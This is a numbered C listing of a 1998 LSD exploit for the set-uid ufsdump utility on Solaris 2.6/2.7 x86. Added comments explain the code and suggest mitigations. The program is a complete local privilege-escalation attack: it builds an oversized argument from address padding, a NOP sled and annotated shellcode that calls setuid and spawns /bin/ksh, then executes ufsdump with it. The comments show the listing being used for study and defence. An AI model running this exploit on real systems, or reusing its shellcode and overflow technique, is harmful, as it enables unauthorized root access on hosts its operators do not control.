
  1. /*## copyright LAST STAGE OF DELIRIUM apr 1998 poland        *://lsd-pl.net/ #*/
  2. /*## /usr/lib/fs/ufs/ufsdump                                                 #*/
  3.  
  /* Sizes, in bytes, of the filler regions that main() writes into its
   * argument buffer: NOPNUM bytes of 0x90, ADRNUM bytes repeating adr[],
   * and TMPNUM bytes repeating tmp[].  ALLIGN is not referenced anywhere
   * in this listing. */
  4. #define NOPNUM 3000
  5. #define ADRNUM 2000
  6. #define TMPNUM 2000
  7. #define ALLIGN 2
  8.  
  /*
   * x86 payload that main() copies byte-for-byte into the argument it
   * passes to ufsdump: 64 bytes of code followed by the path string
   * "/bin/ksh" (72 bytes before the terminating NUL).
   *
   * What the annotated instructions show:
   *  - The stosl/movb pair near the top overwrites the 0xff operand bytes
   *    of the lcall with zeros at run time.  The literal therefore holds
   *    no embedded NUL, but the code must run from memory that is both
   *    writable and executable.
   *  - %al is loaded with 0x17 and later with 0x3b before each call into
   *    the lcall stub; on Solaris x86 these are presumably the setuid and
   *    exec system-call numbers -- confirm against <sys/syscall.h>.
   *  - The displacement byte in "\x88\x42\x08" is 0x08, so that line is
   *    annotated as 0x8(%edx): it stores a zero byte right after the
   *    8-character path string.
   *
   * Defensive relevance: presumably the target only reaches these bytes by
   * executing data copied from its argument vector, so non-executable
   * stack enforcement (where the platform offers it) and a fixed ufsdump
   * both stop it.
   */
  9. char shellcode[]=
  10.     "\x33\xc0"                     /* xorl   %eax,%eax             */
  11.     "\xeb\x08"                     /* jmp    <shellcode+12>        */
  12.     "\x5f"                         /* popl   %edi                  */
  13.     "\x47"                         /* incl   %edi                  */
  14.     "\xab"                         /* stosl  %eax,%es:(%edi)       */
  15.     "\x88\x47\x01"                 /* movb   %al,0x1(%edi)         */
  16.     "\xeb\x0d"                     /* jmp    <shellcode+25>        */
  17.     "\xe8\xf3\xff\xff\xff"         /* call   <shellcode+4>         */
  18.     "\x9a\xff\xff\xff\xff\x07\xff" /* lcall                        */
  19.     "\xc3"                         /* ret                          */
  20.     "\x33\xc0"                     /* xorl   %eax,%eax             */ 
  21.     "\x50"                         /* pushl  %eax                  */
  22.     "\xb0\x17"                     /* movb   $0x17,%al             */
  23.     "\xe8\xee\xff\xff\xff"         /* call   <shellcode+17>        */
  24.     "\xeb\x16"                     /* jmp    <shellcode+59>        */
  25.     "\x33\xd2"                     /* xorl   %edx,%edx             */
  26.     "\x58"                         /* popl   %eax                  */
  27.     "\x8d\x78\x14"                 /* leal   0x14(%eax),%edi       */
  28.     "\x52"                         /* pushl  %edx                  */
  29.     "\x57"                         /* pushl  %edi                  */
  30.     "\x50"                         /* pushl  %eax                  */
  31.     "\xab"                         /* stosl  %eax,%es:(%edi)       */
  32.     "\x92"                         /* xchgl  %eax,%edx             */
  33.     "\xab"                         /* stosl  %eax,%es:(%edi)       */
  34.     "\x88\x42\x08"                 /* movb   %al,0x8(%edx)         */
  35.     "\xb0\x3b"                     /* movb   $0x3b,%al             */
  36.     "\xe8\xd6\xff\xff\xff"         /* call   <shellcode+17>        */
  37.     "\xe8\xe5\xff\xff\xff"         /* call   <shellcode+37>        */
  38.     "/bin/ksh"
  39. ;
  40.  
  /* Two-instruction stub (copy %esp into %eax, then return) that main()
   * calls through a function-pointer cast to read its own stack pointer.
   * Because it is a plain char array, the call only works where
   * initialized data is mapped executable. */
  41. char jump[]=
  42.     "\x8b\xc4"                     /* movl   %esp,%eax             */
  43.     "\xc3"                         /* ret                          */
  44. ;
  45.  
  /*
   * Builds one long argument string and executes /usr/lib/fs/ufs/ufsdump
   * with it.  The banner names Solaris 2.6 and 2.7 on x86 as the affected
   * releases.
   *
   * Buffer layout, in write order: 3 bytes of 0xff, ADRNUM bytes repeating
   * adr[], NOPNUM bytes of 0x90, the shellcode bytes, TMPNUM bytes
   * repeating tmp[], and a terminating NUL.  That is 7076 bytes in total,
   * inside the 10000-byte buffer.
   *
   * Written in pre-C99 style: implicit int return type, no return
   * statement, and no #include for printf, strlen or execl in this listing.
   *
   * For defenders: the observable artifact is an exec of ufsdump whose
   * argv[0] is "lsd" and whose last argument is several kilobytes of
   * mostly non-printable bytes.  Presumably this only matters where
   * ufsdump is installed set-uid.  In that case, installing the vendor
   * fix, or removing the set-uid bit where unprivileged users do not need
   * the tool, closes that path -- verify on the host.
   */
  46. main(int argc,char **argv){
  47.     char buffer[10000],adr[4],tmp[4],*b;
  48.     int i;
  49.  
  50.     printf("copyright LAST STAGE OF DELIRIUM apr 1998 poland  //lsd-pl.net/\n");
  51.     printf("/usr/lib/fs/ufs/ufsdump for solaris 2.6 2.7 x86\n\n");
  52.  
          /* Call the jump stub to read this process's %esp, add fixed
           * offsets, and store each result as raw bytes in adr[] and tmp[].
           * The stores go through an unsigned long pointer into 4-byte
           * arrays, so unsigned long is assumed to be 4 bytes here. */
  53.     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+3236+2000;
  54.     *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+3236;
  55.  
          /* Fill the buffer region by region; b is the write cursor. */
  56.     b=buffer;
  57.     for(i=0;i<3;i++) *b++=0xff;
  58.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
  59.     for(i=0;i<NOPNUM;i++) *b++=0x90;
          /* strlen() stops at the first NUL, so this copies the 72 payload
           * bytes and re-evaluates the length on every iteration. */
  60.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
  61.     for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
  62.     *b=0;
  63.  
          /* argv[0]="lsd", argv[1]="666", argv[2]=buffer.  The list
           * terminator is a bare 0 rather than a null char pointer, and the
           * return value of execl() is not checked. */
  64.     execl("/usr/lib/fs/ufs/ufsdump","lsd","666",buffer,0);
  65. }
  66. /*                    www.hack.co.za           [9 August 2000]*/